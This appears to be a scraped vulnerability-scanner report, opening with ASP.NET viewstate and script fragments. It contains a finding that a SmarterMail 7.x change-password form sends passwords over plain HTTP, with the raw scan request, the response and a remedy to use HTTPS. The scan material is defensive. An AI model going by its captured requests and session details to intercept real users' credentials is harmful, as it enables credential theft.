hbHNlBDIgUE0CMTQCMTQRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIID2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xNSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQQzIFBNAjE1AjE1EVJpZ2h0Q2xpY2thYmxlTmV3AGQCCQ9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTYmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UENCBQTQIxNgIxNhFSaWdodENsaWNrYWJsZU5ldwNBbHRkAgoPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTE3JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDUgUE0CMTcCMTcRUmlnaHRDbGlja2FibGVOZXcAZAINDxQrAA0PFhwFDENsaWVudEV2ZW50cw8FhQFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5DYWxlbmRhckNsaWVudEV2ZW50cywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FggFAVIFDUNsZWFyQ2FsZW5kYXIFAVYFC1NlbGVjdE1vbnRoBQFDBQ1DbGVhckNhbGVuZGFyBQFKBQ1DbGVhckNhbGVuZGFyBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQUERm9jRAYAgBTk2y/NCAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFA0VWU2cFG1VzZUNvbHVtbkhlYWRlcnNBc1NlbGVjdG9yc2gFBE1heEQGAIAHReg9MQkFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAIBMBLe1qggFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAEGAIAU5NsvzUgFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAA8WBh4EU2tpbgUMU21hcnRlclRvb2xzHhNFbmFibGVFbWJlZGRlZFNraW5zaB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoZGQWBB4IQ3NzQ2xhc3MFC3JjTWFpblRhYmxlHgRfIVNCAgIWBB8MBQxyY090aGVyTW9udGgfDQICZBYEHwwFCnJjU2VsZWN0ZWQfDQICZBYEHwwFCnJjRGlzYWJsZWQfDQICFgQfDAUMcmNPdXRPZlJhbmdlHw0CAhYEHwwFCXJjV2Vla2VuZB8NAgIWBB8MBQdyY0hvdmVyHw0CAhYEHwwFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8NAgIWBB8MBQlyY1ZpZXdTZWwfDQICZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwVlZGQYBgUXY3RsMDAkVFBIJHRzVGFicyR0YWJBbGwPMs0LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA5NRU5VX0FsbEV2ZW50cwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUaY3RsMDAkVFBIJHRzVGFicyR0YWJXZWVrbHkPMsYLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAdAV2Vla2x5AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUUY3RsMDAkTVBIJGJ0bk5hdkxlZnQFFWN0bDAwJE1QSCRidG5OYXZSaWdodAUVY3RsMDAkTVBIJGJ0bkNhbFBvcHVwBRdjdGwwMCRNUEgkY2FsRGF0ZVBpY2tlcgUXY3RsMDAkTVBIJGNhbERhdGVQaWNrZXIFGWN0bDAwJFRQSCR0c1RhYnMkdGFiRGFpbHkPMsULAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAZARGFpbHkB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQKC2QFG2N0bDAwJFRQSCR0c1RhYnMkdGFiTW9udGhseQ8yxwsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBNb250aGx5AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRxjdGwwMCRNUEgkY2FsQWxsJGdyZEFsbEFwcHRzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZCnizOylDxOITDBiJNQ9q/9T738W" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1o6y_K2I5aF0r3HOKggytHw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="../Services/svcSuperHyperGrid.asmx/js" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$TitleBar$UpdatePanel2','tctl00$BPH$ctl00','tctl00$UpdatePanel1','tctl00$TPH$UpdatePanel1','tctl00$MPH$ctl00','tctl00$CntPH$UpdatePanel3'], ['ctl00$TitleBar$menuCalendarSourceTitle','ctl00$TPH$lnkTabSelector','ctl00$BPH$btnDelete','ctl00$BPH$btnEdit','ctl00$MPH$rightClickMenu','ctl00$BrPH$searchBar$btnGo','ctl00$BrPH$searchBar$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_UpdatePanel2">

<div class="PageTitle" id="SectionHeader">
<div class="RoundedPageTitleLeft">

<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_TitleBar_menuCalendarSourceTitle' name='ctl00$Titl..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /Main/frmChangePasswordWizard.aspx

/Main/frmChangePasswordWizard.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmChangePasswordWizard.aspx

Form target action

frmChangePasswordWizard.aspx

Request

POST /Main/frmChangePasswordWizard.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmChangePasswordWizard.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 579
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTARGUMENT=1&__EVENTTARGET=1&__VIEWSTATE=%2fwEPDwULLTEwNTUzMjkzNDIPFgYeCF9fX1RpdGxlBQ9DaGFuZ2UgUGFzc3dvcmQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgQCBQ9kFgICAQ9kFgJmD2QWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ8PFgIeB1Zpc2libGVnZBYIAgEPZBYCAgEPZBYCAgIPDxYCHwMFEWR1bW15QGhveXRsbGMuY29tZGQCAg9kFgICAQ9kFgJmDw9kFgIeDGF1dG9jb21wbGV0ZQUDb2ZmZAIDD2QWAgIBD2QWAmYPD2QWAh8FBQNvZmZkAgQPZBYCAgEPZBYCZg8PZBYCHwUFA29mZmRkmKl6CBjVXQYNNumHNVnM9WXDsuU%3d&ctl00$MPH$txtConfNewPassword_SettingText=1&ctl00$MPH$txtNewPassword_SettingText=1&ctl00$MPH$txtOldPassword_SettingText=1

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:56:35 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3021
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Change Password - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Wizard/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Wizard" dir="ltr">
<form method="post" action="frmChangePasswordWizard.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwNTUzMjkzNDIPFgYeCF9fX1RpdGxlBQ9DaGFuZ2UgUGFzc3dvcmQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgQCBQ9kFgICAQ9kFgJmD2QWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ8PFgIeB1Zpc2libGVnZBYIAgEPZBYCAgEPZBYCAgIPDxYCHwMFEWR1bW15QGhveXRsbGMuY29tZGQCAg9kFgICAQ9kFgJmDw9kFgIeDGF1dG9jb21wbGV0ZQUDb2ZmZAIDD2QWAgIBD2QWAmYPD2QWAh8FBQNvZmZkAgQPZBYCAgEPZBYCZg8PZBYCHwUFA29mZmRkmKl6CBjVXQYNNumHNVnM9WXDsuU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


